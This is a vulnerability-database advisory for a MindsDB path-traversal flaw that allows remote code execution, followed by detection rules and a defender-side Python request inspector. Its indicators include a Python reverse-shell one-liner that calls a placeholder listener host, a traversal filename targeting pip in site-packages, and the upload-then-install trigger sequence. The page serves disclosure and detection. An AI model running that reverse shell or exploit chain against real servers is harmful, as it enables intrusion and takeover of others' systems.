cbcvebase.
CVE-2026-27483
published 2026-02-24

Priority: P179 · Severity: high · CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EXPLOIT
EPSS: 11.11% (95.4th percentile)
MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 25.9.1.1, there is a path traversal vulnerability in MindsDB's /api/files interface, which an authenticated attacker can exploit to achieve remote command execution. The vulnerability exists in the "Upload File" module, which corresponds to the API endpoint /api/files. Because the multipart file upload performs no security checks on the uploaded file path, an attacker can perform path traversal by placing `../` sequences in the filename field. The file write occurs before clear_filename and save_file are called, so neither the filename nor the file type is filtered, and arbitrary content can be written to any path on the server. Version 25.9.1.1 patches the issue.

Affected (2 ranges)

Vendor    Product   Version range       Fixed in
mindsdb   mindsdb   < 25.9.1.1          25.9.1.1
mindsdb   mindsdb   >= 0, < 25.9.1.1    25.9.1.1

Detection & IOCs (extracted from sources)

url:      PUT /api/files/{(unknown)}
path:     /api/files
path:     /api/login
path:     /api/status
path:     /api/handlers/anomaly_detection/install
path:     ../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py
port:     47334
command:  import os,pty,socket s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("{lhost}",{lport})) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) pty.spawn("/bin/sh")
  • Detect multipart PUT requests to /api/files/* where the filename field in the Content-Disposition header contains path traversal sequences (../).
  • Alert on PUT /api/files requests where the multipart filename parameter resolves to a path outside the intended upload directory, especially targeting Python site-packages (e.g., pip/__init__.py).
  • Monitor for a POST to /api/handlers/<handler>/install returning HTTP 500 with body containing 'Failed to install dependencies' shortly after a suspicious PUT /api/files upload — this two-step sequence is the RCE trigger pattern.
  • Flag HTTP 400 responses containing 'Not supported format' from /api/files PUT requests as a successful path-traversal payload upload indicator (the exploit treats this as upload success).
  • Insikt Group created a Nuclei template for CVE-2026-27483; defenders can use it to identify vulnerable MindsDB instances (versions >= 25.4.1.0 and < 25.9.1.1).
  • Check the /api/status endpoint response for 'mindsdb_version' to fingerprint vulnerable instances; versions matching >= 25.4.1.0 and < 25.9.1.1 are exploitable.
  • The path traversal payload specifically targets the Python venv pip package path (venv/lib/python3.10/site-packages/pip/__init__.py) to achieve RCE via handler install; the exact path may vary depending on the server's Python version and venv layout.
  • Version 25.9.1.1 patches the issue; the PoC explicitly aborts if the detected version is >= 25.9.1.1.
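A defender-side implementation of the first two detection rules above plus the /api/status version fingerprint, added here as an example that is not code from the page, MindsDB, or Insikt Group; the upload directory, hostname and sample request are constructed assumptions.

```python
import posixpath
import re

# Hypothetical upload root; the page does not state MindsDB's real directory.
UPLOAD_DIR = "/var/lib/mindsdb/uploads"
# Vulnerable window as given for the Nuclei template: >= 25.4.1.0 and < 25.9.1.1
VULN_MIN, FIXED = (25, 4, 1, 0), (25, 9, 1, 1)
FILENAME_RE = re.compile(r'filename="([^"]*)"')


def parse_version(text):
    """Turn '25.9.1' into a 4-tuple so versions compare numerically."""
    parts = [int(p) for p in text.strip().split(".")]
    return tuple(parts + [0] * (4 - len(parts)))[:4]


def is_vulnerable_version(text):
    """Fingerprint check against the mindsdb_version string from /api/status."""
    return VULN_MIN <= parse_version(text) < FIXED


def escapes_upload_dir(filename, upload_dir=UPLOAD_DIR):
    """True if naively joining the multipart filename onto the upload dir leaves it.
    An absolute filename also escapes, since posixpath.join discards the base."""
    target = posixpath.normpath(posixpath.join(upload_dir, filename))
    return target != upload_dir and not target.startswith(upload_dir + "/")


def inspect_request(raw):
    """Return findings for one raw HTTP request (headers + body as text)."""
    head, _, body = raw.partition("\r\n\r\n")
    tokens = head.split("\r\n", 1)[0].split(" ")
    findings = []
    if len(tokens) < 2 or tokens[0] != "PUT" or not tokens[1].startswith("/api/files"):
        return findings
    for name in FILENAME_RE.findall(body):  # every multipart part's filename
        if "../" in name or "..\\" in name:
            findings.append("traversal sequence in filename: " + name)
        if escapes_upload_dir(name):
            findings.append("filename resolves outside upload dir: " + name)
        if "site-packages" in name:
            findings.append("filename targets Python site-packages: " + name)
    return findings


# Constructed sample request with the shape described above; the body is inert.
SAMPLE_REQUEST = (
    "PUT /api/files/test HTTP/1.1\r\nHost: mindsdb.internal:47334\r\n"
    "Content-Type: multipart/form-data; boundary=b1\r\n\r\n--b1\r\n"
    'Content-Disposition: form-data; name="file"; '
    'filename="../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py"\r\n'
    "\r\n# inert sample content\r\n--b1--\r\n"
)
```

Feed inspect_request the raw request text from a proxy or WAF log; any non-empty result is an alert candidate.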